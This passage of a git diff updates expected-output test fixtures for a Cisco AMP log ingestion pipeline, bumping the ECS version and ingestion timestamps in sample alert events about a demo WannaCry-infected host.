                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229331435814971\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -4177,7 +4177,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -4197,7 +4197,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:54.500232553Z",
+                "ingested": "2021-09-13T18:07:28.111239763Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":56000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229331435814970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -4254,7 +4254,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -4284,7 +4284,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:54.500234601Z",
+                "ingested": "2021-09-13T18:07:28.111241843Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":773000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782278\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -4339,7 +4339,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -4369,7 +4369,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:54.500236656Z",
+                "ingested": "2021-09-13T18:07:28.111243912Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":648000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782277\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -4424,7 +4424,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -4454,7 +4454,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:54.500238724Z",
+                "ingested": "2021-09-13T18:07:28.111245976Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":570000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782276\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -4509,7 +4509,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -4539,7 +4539,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:54.500240848Z",
+                "ingested": "2021-09-13T18:07:28.111248029Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":414000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782275\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -4594,7 +4594,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -4624,7 +4624,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:54.500242912Z",
+                "ingested": "2021-09-13T18:07:28.111250102Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":368000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782274\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -4679,7 +4679,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -4709,7 +4709,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:54.500244968Z",
+                "ingested": "2021-09-13T18:07:28.111252179Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":134000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782273\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -4764,7 +4764,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -4794,7 +4794,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:54.500247029Z",
+                "ingested": "2021-09-13T18:07:28.111254243Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782272\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -4849,7 +4849,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -4879,7 +4879,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:54.500249078Z",
+                "ingested": "2021-09-13T18:07:28.111256297Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782271\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -4934,7 +4934,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -4964,7 +4964,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:54.500251139Z",
+                "ingested": "2021-09-13T18:07:28.111258359Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":56000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782270\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -5017,7 +5017,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -5037,7 +5037,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:54.500253189Z",
+                "ingested": "2021-09-13T18:07:28.111260412Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log
similarity index 100%
rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log
rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log-expected.json
similarity index 97%
rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log-expected.json
rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log-expected.json
index c2aa4b46070..d7f77b936f5 100644
--- a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log-expected.json
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log-expected.json
@@ -8,7 +8,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -28,7 +28,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094001496Z",
+                "ingested": "2021-09-13T18:07:42.929459130Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847664\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -83,7 +83,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -103,7 +103,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094015339Z",
+                "ingested": "2021-09-13T18:07:42.929464236Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847663\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -158,7 +158,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -178,7 +178,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094017473Z",
+                "ingested": "2021-09-13T18:07:42.929466403Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847662\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -233,7 +233,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -253,7 +253,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094019533Z",
+                "ingested": "2021-09-13T18:07:42.929468348Z",
